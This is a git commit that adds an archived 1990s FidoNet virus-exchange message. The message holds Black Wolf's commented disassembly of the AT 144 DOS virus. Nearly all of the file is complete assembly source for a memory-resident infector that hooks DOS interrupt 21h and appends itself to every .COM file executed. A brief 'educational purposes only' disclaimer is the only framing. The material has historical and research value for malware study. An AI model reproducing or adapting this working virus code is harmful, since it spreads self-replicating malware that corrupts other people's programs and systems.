Add files via upload

2026-06-16 15:59:24 +00:00 · 2021-01-12 18:04:54 -06:00
parent 3e7d2e8262
commit 6bf46a48b9
99 changed files with 46230 additions and 0 deletions
@@ -0,0 +1,151 @@
+;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
+; Msg  : 7 of 54
+; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:11
+; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
+; Subj : AT_144.ASM
+;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+;.RealName: Max Ivanov
+;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
+;* Kicked-up by MeteO (2:5030/136)
+;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
+;* From : Doug Bryce, 2:283/718 (06 Nov 94 16:24)
+;* To   : Mike Salvino
+;* Subj : AT_144.ASM
+;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
+;@RFC-Path:
+;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
+;18.n283!not-for-mail
+;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org
+;This is a disassembly of the AT 144 virus.  It is processor specific
+;and will only run on AT-class machines (286+).  It copies itself
+;onto the interrupt table and hooks int 21h, function 4bh.  Because
+;it is on the interrupt table - to call Int 21h in its infection routine
+;it merely calls an INT corresponding to where it stores its
+;old handler vectors.  In this case - it is Int B4h.  One interesting thing
+;is the JMP SI instruction at the end to return to the host - this
+;works because DOS initially sets SI to 100 for running COM files.
+;This virus infects any .COM file executed.
+
+;Please - Do NOT release this or any other virus.
+;For educational purposes ONLY!  I take no responsibility for damages caused
+;by the misuse of this or any other disassembly - they are made to help
+;educate programmers as to the workings of the individual viruses and
+;viruses as a whole.  Such information MUST remain free and uncensored.
+
+;Disassembly by Black Wolf
+
+.model tiny
+.286
+.code
+    org 100h
+
+start:
+        db      0e9h,02,0               ;Jump Virus_Entry
+
+Host_File:
+        int     21h                     ;Terminate.
+
+Virus_Entry:
+        pusha
+        mov     di,si
+        call    Get_Displacement
+
+Get_Displacement:
+        pop     si
+        add     si,31h                  ;SI = storage bytes
+        movsb
+        movsw                           ;Restore host in memory.
+
+        mov     ax,24h                  ;Set ES:DI to interrupt table
+        mov     es,ax                   ;DS:SI to beginning of virus
+        xor     di,di
+        sub     si,3Ah
+        cmp     byte ptr es:[di],60h    ;Check if installed.
+        mov     cl,90h
+        rep     movsb                   ;Copy virus into memory
+
+        jz      Done_Install
+        mov     ds,cx
+        mov     si,84h                  ;Get Int 21 vector.
+        movsw
+        movsw
+        mov     word ptr [si-4],3Ah     ;Hook Int 21
+        mov     [si-2],ax
+        push    cs
+        pop     ds
+
+Done_Install:
+        push    cs
+        pop     es
+        popa
+        jmp     si                      ;Jumps back to host....
+                        ;DOS sets SI = 100h when
+                        ;a COM is loaded.
+Jump_Byte       db      0e9h
+Storage_Bytes:
+        mov     ax,4c00h
+
+Int_21_Handler:
+        pusha                           ;Save all Regs.
+        push    ds
+        xor     ah,4Bh                  ;Check if execute
+        jnz     Exit_Handler
+        mov     ax,3D02h
+        int     0B4h                    ;Open the file for read/write
+        jc      Exit_Handler
+        mov     bx,ax
+        push    cs
+        pop     ds
+        mov     ah,3Fh
+        mov     cx,3
+        mov     dx,37h
+        mov     si,dx
+        int     0B4h                    ;Read in 3 bytes for storage.
+        cmp     byte ptr [si],4Dh
+        je      Close_File              ;Check if it's an EXE
+        mov     ax,4202h
+        xor     cx,cx
+        xor     dx,dx
+        int     0B4h                    ;Go to end of file
+        sub     al,3                    ;save jump size.
+        mov     bp,ax
+        mov     cl,90h                  ;If the 2nd and 3rd bytes of
+        sub     ax,cx                   ;the file correspond to what
+        cmp     ax,[si+1]               ;a jump WOULD be if the virus
+                        ;were already there, exit.
+        je      Close_File              ;(Quit if infected)
+        mov     ah,40h                  ;Append Virus
+        int     0B4h
+        mov     ax,4200h
+        xor     cx,cx
+        int     0B4h                    ;Go back to the beginning
+        mov     ah,40h
+        lea     dx,[si-1]
+        mov     cl,3
+        mov     [si],bp
+        int     0B4h                    ;Write in the jump.
+
+Close_File:
+        mov     ah,3Eh
+        int     0B4h                    ;Close file.
+Exit_Handler:
+        pop     ds
+        popa                            ;Exit Handler
+        db      0EAh                    ;Far Jump to old Int 21h.
+end_virus:
+end     start
+
+;-+-  Concord/QWK O.O1 Beta-7
+; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
+;=============================================================================
+;
+;Yoo-hooo-oo, -!
+;
+;
+;    þ The MeÂeO
+;
+;/x            Include false conditionals in listing
+;
+;--- Aidstest Null: /Kill
+; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
+